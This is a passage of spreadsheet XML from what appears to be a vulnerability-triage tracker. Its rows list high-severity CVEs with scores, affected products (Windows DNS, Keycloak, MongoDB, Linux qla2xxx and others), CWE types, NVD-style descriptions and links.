          <t>A race condition was addressed with additional validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. A local user may be able to cause unexpected system termination or read kernel memory.</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65415</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K393"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393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K394"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394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74909</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>Keycloak provides a policy enforcer to protect applications by matching incoming web requests against defined security policies. A flaw was found where the enforcer fails to correctly normalize web addresses that contain special encoded characters, such as those representing semicolons or directory traversal segments. An authenticated user can use these encoded characters to trick the enforcer into applying a less restrictive security policy than intended, potentially gaining unauthorized access to sensitive administrative or private application endpoints.</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74909</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81268</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute flows and obtain sensitive information due to insufficient session expiration of API keys after user deactivation.</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81268</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81551</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to arbitrarily write to or delete files on shared storage due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81551</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds read security issue exists in the query planning component of MongoDB Server. An authenticated user with database read and write privileges can trigger the security issue through crafted query operations, causing the server to read memory beyond allocated buffer boundaries. The revealed memory contents may be partially observable through diagnostic query statistics output.</t>
        </is>
      </c>
      <c r="S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82291</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>HeyForm before 3.0.0-rc.8 reflects the request Origin header in CORS responses while allowing credentials, enabling cross-origin requests with authentication. Attackers can execute authenticated GraphQL queries from malicious pages visited by logged-in users to access workspaces, projects, forms, submissions, and respondent data, or modify account settings.</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82291</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84516</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Processing a maliciously crafted file may result in unexpected app termination or disclosure of process memory.</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84516</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87036</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87036</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87075</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87075</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89848</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Quiesce response IRQ before freeing request queue
qla2xxx_delete_qpair() deletes the request queue before the response
queue. qla25xx_delete_req_que() frees the request queue memory
(kfree(req) in qla25xx_free_req_que()), but the response-queue MSI-X is
only released later, in qla25xx_free_rsp_que(). In that window the
response interrupt can still fire, qla2xxx_msix_rsp_q() queues
qpair-&gt;q_work, and qla_do_work() -&gt; qla24xx_process_response_queue()
dereferences the now-freed rsp-&gt;req (LOGINOUT/CT/ELS entries and the
status path), a use-after-free.
The cancel_work_sync() added for the qpair teardown lives in the
response free path, which runs after the request queue is already freed,
so it does not protect rsp-&gt;req.
Release the response-queue interrupt and flush qpair-&gt;q_work before
deleting the request queue, so no late completion can reach the freed
request queue. Clearing have_irq makes the subsequent
qla25xx_free_rsp_que() skip its free_irq(), and the firmware
queue-delete order (request then response) is preserved; the
request-delete mailbox completes on the default vector and is unaffected
by dropping the qpair response interrupt early.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89848</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89861</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Hold vport reference in qla24xx_report_id_acquisition()
In the format 1 path, the virtual port is located on ha-&gt;vp_list while
holding vport_slock, but the lock is dropped before vp is used:
qla_update_host_map() is called and VP_IDX_ACQUIRED/REGISTER_FC4_NEEDED/
REGISTER_FDMI_NEEDED are set on vp. No reference is taken across that
window, so a concurrent qla24xx_deallocate_vp_id() can tear the vport
down and free it, leading to a use-after-free.
Take a vport reference (vref_count) under vport_slock when the matching
vp is found, and drop it after the last use of
vp. qla24xx_deallocate_vp_id() waits for vref_count to reach zero before
unlinking and freeing the vport, so the pointer stays valid. This
matches the reference idiom already used by the other ha-&gt;vp_list
traversals.</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89861</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89999</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
